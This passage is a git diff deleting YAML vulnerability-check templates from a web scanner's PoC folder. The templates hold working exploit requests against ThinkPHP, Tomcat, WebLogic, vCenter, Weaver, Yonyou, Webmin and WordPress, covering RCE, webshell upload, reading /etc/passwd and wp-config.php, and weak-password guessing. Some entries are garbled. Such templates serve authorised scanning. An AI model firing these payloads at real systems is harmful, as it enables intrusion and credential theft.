3f18e6e..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No6.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth6 -rules: - - method: GET - path: /actuator/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No7.yml b/WebScan/pocs/swagger-ui-unauth-No7.yml deleted file mode 100644 index 2e130c9..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No7.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth7 -rules: - - method: GET - path: /libs/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No8.yml b/WebScan/pocs/swagger-ui-unauth-No8.yml deleted file mode 100644 index 33a63f4..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No8.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui8 -rules: - - method: GET - path: /template/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/thinkadmin-v6-readfile.yml b/WebScan/pocs/thinkadmin-v6-readfile.yml deleted file mode 100644 index 37755bf..0000000 --- a/WebScan/pocs/thinkadmin-v6-readfile.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-thinkadmin-v6-readfile -rules: - - method: GET - path: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes("PD9waH")) && response.body.bcontains(bytes("VGhpbmtBZG1pbg")) -detail: - author: 0x_zmz(github.com/0x-zmz) - info: thinkadmin-v6-readfile By 0x_zmz - links: - - https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw - - https://github.com/0x-zmz diff --git a/WebScan/pocs/thinkcmf-lfi.yml b/WebScan/pocs/thinkcmf-lfi.yml deleted file mode 100644 index 3b56650..0000000 --- a/WebScan/pocs/thinkcmf-lfi.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-thinkcmf-lfi - -rules: - - method: GET - path: "/?a=display&templateFile=README.md" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) - -detail: - author: JerryKing - ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 - links: - - https://www.freebuf.com/vuls/217586.html diff --git a/WebScan/pocs/thinkcmf-write-shell.yml b/WebScan/pocs/thinkcmf-write-shell.yml deleted file mode 100644 index 5527f44..0000000 --- a/WebScan/pocs/thinkcmf-write-shell.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: poc-yaml-thinkcmf-write-shell -set: - r: randomInt(10000, 20000) - r1: randomInt(1000000000, 2000000000) -rules: - - method: GET - path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}}%3B%22)%3B" - expression: "true" - - method: GET - path: "/{{r}}.php" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1))) - -detail: - author: violin - ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 - links: - - https://www.freebuf.com/vuls/217586.html diff --git a/WebScan/pocs/thinkphp-v6-file-write.yml b/WebScan/pocs/thinkphp-v6-file-write.yml deleted file mode 100644 index 8346f40..0000000 --- a/WebScan/pocs/thinkphp-v6-file-write.yml +++ /dev/null @@ -1,26 +0,0 @@ -name: poc-yaml-thinkphp-v6-file-write -set: - f1: randomInt(800000000, 900000000) -rules: - - method: GET - path: /{{f1}}.php - follow_redirects: true - expression: | - response.status == 404 - - method: GET - path: / - headers: - Cookie: PHPSESSID=../../../../public/{{f1}}.php - follow_redirects: true - expression: | - response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains(string(f1)) - - method: GET - path: /{{f1}}.php - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("text/html") -detail: - author: Loneyer - Affected Version: "Thinkphp 6.0.0" - links: - - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write diff --git a/WebScan/pocs/thinkphp5-controller-rce.yml b/WebScan/pocs/thinkphp5-controller-rce.yml deleted file mode 100644 index c0ddd62..0000000 --- a/WebScan/pocs/thinkphp5-controller-rce.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-thinkphp5-controller-rce -rules: - - method: GET - path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 - expression: | - response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") - -detail: - links: - - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce \ No newline at end of file diff --git a/WebScan/pocs/thinkphp5023-method-rce.yml b/WebScan/pocs/thinkphp5023-method-rce.yml deleted file mode 100644 index d24987b..0000000 --- a/WebScan/pocs/thinkphp5023-method-rce.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-thinkphp5023-method-rce -rules: - - method: POST - path: /index.php?s=captcha - headers: - Content-Type: application/x-www-form-urlencoded - body: | - _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 - expression: | - response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") -detail: - links: - - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce \ No newline at end of file diff --git a/WebScan/pocs/tianqing-info-leak.yml b/WebScan/pocs/tianqing-info-leak.yml deleted file mode 100644 index 6bf6789..0000000 --- a/WebScan/pocs/tianqing-info-leak.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-tianqing-info-leak -rules: - - method: GET - path: /api/dbstat/gettablessize - expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name") -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/tomcat-cve-2017-12615-rce.yml b/WebScan/pocs/tomcat-cve-2017-12615-rce.yml deleted file mode 100644 index dc1fdf7..0000000 --- a/WebScan/pocs/tomcat-cve-2017-12615-rce.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-tomcat-cve-2017-12615-rce -set: - filename: randomLowercase(6) - verifyStr: randomLowercase(12) - commentStr: randomLowercase(12) -rules: - - method: PUT - path: '/{{filename}}.jsp/' - body: '{{verifyStr}} <%-- {{commentStr}} --%>' - follow_redirects: false - expression: | - response.status == 201 - - method: GET - path: '/{{filename}}.jsp' - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://www.seebug.org/vuldb/ssvid-96562 - - https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA diff --git a/WebScan/pocs/tomcat-cve-2018-11759.yml b/WebScan/pocs/tomcat-cve-2018-11759.yml deleted file mode 100644 index 7ab73aa..0000000 --- a/WebScan/pocs/tomcat-cve-2018-11759.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-tomcat-cve-2018-11759 -rules: - - method: GET - path: /jkstatus; - follow_redirects: false - expression: | - response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body) - - method: GET - path: /jkstatus;?cmd=dump - follow_redirects: false - expression: | - response.status == 200 && "ServerRoot=*".bmatches(response.body) -detail: - author: loneyer - links: - - https://github.com/immunIT/CVE-2018-11759 diff --git a/WebScan/pocs/tomcat-manager-weak.yml b/WebScan/pocs/tomcat-manager-weak.yml deleted file mode 100644 index b167851..0000000 --- a/WebScan/pocs/tomcat-manager-weak.yml +++ /dev/null @@ -1,31 +0,0 @@ -name: poc-yaml-tomcat-manager-weak -sets: - username: - - tomcat - - admin - - root - - manager - password: - - "" - - admin - - tomcat - - 123456 - - root - payload: - - base64(username+":"+password) -rules: - - method: GET - path: /manager/html - follow_redirects: false - expression: | - response.status == 401 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") - - method: GET - path: /manager/html - headers: - Authorization: Basic {{payload}} - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/tongda-meeting-unauthorized-access.yml b/WebScan/pocs/tongda-meeting-unauthorized-access.yml deleted file mode 100644 index b7e4e5c..0000000 --- a/WebScan/pocs/tongda-meeting-unauthorized-access.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-tongda-meeting-unauthorized-access -rules: - - method: GET - path: >- - /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay - headers: - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36' - Accept-Encoding: 'deflate' - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle"))) -detail: - author: 清风明月(www.secbook.info) - influence_version: ' < 通达OA 11.5' - links: - - https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA diff --git a/WebScan/pocs/tongda-user-session-disclosure.yml b/WebScan/pocs/tongda-user-session-disclosure.yml deleted file mode 100644 index 05768d9..0000000 --- a/WebScan/pocs/tongda-user-session-disclosure.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-tongda-user-session-disclosure -rules: - - method: GET - path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 - follow_redirects: false - expression: "true" - - - method: POST - path: /general/userinfo.php?UID=1 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ \ No newline at end of file diff --git a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml b/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml deleted file mode 100644 index 19b9ba6..0000000 --- a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ueditor-cnvd-2017-20077-file-upload -rules: - - method: GET - path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 - headers: - Accept-Encoding: 'deflate' - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源"))) -detail: - author: 清风明月(www.secbook.info) - influence_version: 'UEditor v1.4.3.3' - links: - - https://zhuanlan.zhihu.com/p/85265552 - - https://www.freebuf.com/vuls/181814.html - exploit: >- - http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 diff --git a/WebScan/pocs/vengd-upload-rce.yml b/WebScan/pocs/vengd-upload-rce.yml deleted file mode 100644 index deaec2f..0000000 --- a/WebScan/pocs/vengd-upload-rce.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-vengd-upload-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - r3: randomInt(40000, 44800) - r4: randomInt(40000, 44800) -rules: - - method: POST - path: /Upload/upload_file.php?l={{r1}} - headers: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv - body: |- - ------WebKitFormBoundaryfcKRltGv - Content-Disposition: form-data; name="file"; filename="{{r2}}.php" - Content-Type: image/avif - - ------WebKitFormBoundaryfcKRltGv-- - expression: response.status == 200 && response.body.bcontains(b"_Request:") - - method: GET - path: '/Upload/{{r1}}/{{r2}}.php' - expression: response.status == 200 && response.body.bcontains(bytes(string(r3 * r4))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml deleted file mode 100644 index a32c5c2..0000000 --- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-vmware-vcenter-arbitrary-file-read -rules: - - method: GET - path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml deleted file mode 100644 index 064aa10..0000000 --- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-vmware-vcenter-arbitrary-file-read2 -rules: - - method: GET - path: /eam/vib?id=/etc/passwd - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml b/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml deleted file mode 100644 index 6d3b795..0000000 --- a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-vmware-vcenter-cve-2021-21985-rce -rules: - - method: POST - path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - headers: - Content-Type: application/json - body: |- - {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a - expression: | - response.status == 200 && response.body.bcontains(b"result") -detail: - vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData" - author: envone77 - description: "vmware vCenter unauth RCE cve-2021-21985" - links: - - https://www.anquanke.com/post/id/243098 - - https://github.com/alt3kx/CVE-2021-21985_PoC \ No newline at end of file diff --git a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml b/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml deleted file mode 100644 index c2ed9a9..0000000 --- a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972 -rules: - - method: GET - path: /ui/vropspluginui/rest/services/uploadova - follow_redirects: false - expression: | - response.status == 405 && response.body.bcontains(b"Method Not Allowed") - - method: GET - path: /ui/vropspluginui/rest/services/getstatus - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://swarm.ptsecurity.com/unauth-rce-vmware/ \ No newline at end of file diff --git a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml b/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml deleted file mode 100644 index 6b27d65..0000000 --- a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf -rules: - - method: POST - path: /casa/nodes/thumbprints - headers: - Content-Type: application/json - body: | - ["127.0.0.1:443/ui/"] - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) -detail: - author: Loneyer - links: - - https://www.vmware.com/security/advisories/VMSA-2021-0004.html \ No newline at end of file diff --git a/WebScan/pocs/weaver-ebridge-file-read-linux.yml b/WebScan/pocs/weaver-ebridge-file-read-linux.yml deleted file mode 100644 index 47d9379..0000000 --- a/WebScan/pocs/weaver-ebridge-file-read-linux.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-weaver-ebridge-file-read-linux -rules: - - method: GET - path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt" - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") - search: | - \"id\"\:\"(?P.+?)\"\, - - method: GET - path: "/file/fileNoLogin/{{var}}" - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: mvhz81 - info: e-bridge-file-read for Linux - links: - - https://mrxn.net/Infiltration/323.html diff --git a/WebScan/pocs/weaver-ebridge-file-read-windows.yml b/WebScan/pocs/weaver-ebridge-file-read-windows.yml deleted file mode 100644 index cb06435..0000000 --- a/WebScan/pocs/weaver-ebridge-file-read-windows.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-weaver-ebridge-file-read-windows -rules: - - method: GET - path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") - search: | - \"id\"\:\"(?P.+?)\"\, - - method: GET - path: /file/fileNoLogin/{{var}} - follow_redirects: false - expression: | - response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) -detail: - author: mvhz81 - info: e-bridge-file-read for windows - links: - - https://mrxn.net/Infiltration/323.html diff --git a/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml b/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml deleted file mode 100644 index f37b591..0000000 --- a/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml +++ /dev/null @@ -1,24 +0,0 @@ -name: poc-yaml-weaver-oa-arbitrary-file-upload -set: - r1: randomLowercase(4) - r2: randomInt(40000, 44800) - r3: randomInt(40000, 44800) -rules: - - method: POST - path: /page/exportImport/uploadOperation.jsp - headers: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo - body: |- - ------WebKitFormBoundaryFy3iNVBftjP6IOwo - Content-Disposition: form-data; name="file"; filename="{{r1}}.jsp" - Content-Type: application/octet-stream - <%out.print({{r2}} * {{r3}});%> - ------WebKitFormBoundaryFy3iNVBftjP6IOwo-- - expression: response.status == 200 - - method: GET - path: '/page/exportImport/fileTransfer/{{r1}}.jsp' - expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/weblogic-cve-2020-14750.yml b/WebScan/pocs/weblogic-cve-2020-14750.yml deleted file mode 100644 index 8db8464..0000000 --- a/WebScan/pocs/weblogic-cve-2020-14750.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-weblogic-cve-2020-14750 -rules: - - method: GET - path: /console/images/%252E./console.portal - follow_redirects: false - expression: | - (response.status == 302 && response.body.bcontains(bytes("/console/console.portal")) || response.body.bcontains(bytes("/console.portal?_nfpb=true"))) -detail: - author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless) - weblogic_version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 - links: - - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html diff --git a/WebScan/pocs/weblogic-ssrf.yml b/WebScan/pocs/weblogic-ssrf.yml deleted file mode 100644 index 1c84c1c..0000000 --- a/WebScan/pocs/weblogic-ssrf.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-weblogic-ssrf -rules: - - method: GET - path: >- - /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 - headers: - Cookie: >- - publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; - follow_redirects: false - expression: >- - response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed")) diff --git a/WebScan/pocs/weblogic-v10-cve-2017-10271.yml b/WebScan/pocs/weblogic-v10-cve-2017-10271.yml deleted file mode 100644 index 1468f14..0000000 --- a/WebScan/pocs/weblogic-v10-cve-2017-10271.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-weblogic-cve-2017-10271 # nolint[:namematch] -rules: - - method: POST - path: /wls-wsat/CoordinatorPortType - headers: - Content-Type: text/xml - body: >- - 505053555551485749 - follow_redirects: true - expression: > - response.body.bcontains(b"225773091") -detail: - vulnpath: '/wls-wsat/CoordinatorPortType' - author: fnmsd(https://github.com/fnmsd) - description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2017-10271' - weblogic_version: '10' - links: - - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 - - https://github.com/QAX-A-Team/WeblogicEnvironment - - https://xz.aliyun.com/t/5299 \ No newline at end of file diff --git a/WebScan/pocs/weblogic-v12-cve-2019-2725.yml b/WebScan/pocs/weblogic-v12-cve-2019-2725.yml deleted file mode 100644 index 176adae..0000000 --- a/WebScan/pocs/weblogic-v12-cve-2019-2725.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-weblogic-cve-2019-2725 # nolint[:namematch] -rules: - - method: POST - path: /wls-wsat/CoordinatorPortType - headers: - Content-Type: text/xml - body: >- - fffhelloorg.slf4j.ext.EventDataconnectionHandlertrue505053555551485749]]> - follow_redirects: true - expression: > - response.body.bcontains(b"225773091") -detail: - vulnpath: '/wls-wsat/CoordinatorPortType' - author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166) - description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2019-2725 + org.slf4j.ext.EventData' - weblogic_version: '>12' - links: - - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 - - https://github.com/QAX-A-Team/WeblogicEnvironment - - https://xz.aliyun.com/t/5299 \ No newline at end of file diff --git a/WebScan/pocs/webmin-cve-2019-15107-rce.yml b/WebScan/pocs/webmin-cve-2019-15107-rce.yml deleted file mode 100644 index 9a7a1ce..0000000 --- a/WebScan/pocs/webmin-cve-2019-15107-rce.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: poc-yaml-webmin-cve-2019-15107-rce -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /password_change.cgi - headers: - Referer: "{{url}}" - body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2 - follow_redirects: false - expression: > - response.body.bcontains(bytes(string(r1 + r2))) -detail: - author: danta - description: Webmin 远程命令执行漏洞(CVE-2019-15107) - links: - - https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 diff --git a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml b/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml deleted file mode 100644 index 5d75468..0000000 --- a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-wordpress-cve-2019-19985-infoleak -rules: - - method: GET - path: "/wp-admin/admin.php?page=download_report&report=users&status=all" - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) -detail: - author: bufsnake(https://github.com/bufsnake) - links: - - https://www.exploit-db.com/exploits/48698 diff --git a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml b/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml deleted file mode 100644 index a26f05d..0000000 --- a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-wordpress-ext-adaptive-images-lfi -rules: - - method: GET - path: >- - /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://www.anquanke.com/vul/id/1674598 - - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 diff --git a/WebScan/pocs/wordpress-ext-mailpress-rce.yml b/WebScan/pocs/wordpress-ext-mailpress-rce.yml deleted file mode 100644 index 523b0f2..0000000 --- a/WebScan/pocs/wordpress-ext-mailpress-rce.yml +++ /dev/null @@ -1,23 +0,0 @@ -name: poc-yaml-wordpress-ext-mailpress-rce -set: - r: randomInt(800000000, 1000000000) - r1: randomInt(800000000, 1000000000) -rules: - - method: POST - path: "/wp-content/plugins/mailpress/mp-includes/action.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=&html=&plaintext=&mail_format=standard&autosave=1 - expression: "true" - search: | - XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'set/A {{r1}}*{{r2}}' - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://www.hackbug.net/archives/111.html diff --git a/WebScan/pocs/yonyou-grp-u8-sqli.yml b/WebScan/pocs/yonyou-grp-u8-sqli.yml deleted file mode 100644 index 5fd8452..0000000 --- a/WebScan/pocs/yonyou-grp-u8-sqli.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-yonyou-grp-u8-sqli -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /Proxy - body: > - cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html \ No newline at end of file diff --git a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml deleted file mode 100644 index 8e6b75e..0000000 --- a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml +++ /dev/null @@ -1,26 +0,0 @@ -name: poc-yaml-yonyou-nc-arbitrary-file-upload -set: - r1: randomInt(10000, 20000) - r2: randomInt(1000000000, 2000000000) - r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t" - r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx" -rules: - - method: POST - path: /servlet/FileReceiveServlet - headers: - Content-Type: multipart/form-data; - body: >- - {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> - expression: | - response.status == 200 - - method: GET - path: '/{{r1}}.jsp' - headers: - Content-Type: application/x-www-form-urlencoded - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r2))) -detail: - author: pa55w0rd(www.pa55w0rd.online/) - Affected Version: "YONYOU NC > 6.5" - links: - - https://blog.csdn.net/weixin_44578334/article/details/110917053 \ No newline at end of file diff --git a/WebScan/pocs/zabbix-authentication-bypass.yml b/WebScan/pocs/zabbix-authentication-bypass.yml deleted file mode 100644 index 1cc08ab..0000000 --- a/WebScan/pocs/zabbix-authentication-bypass.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: 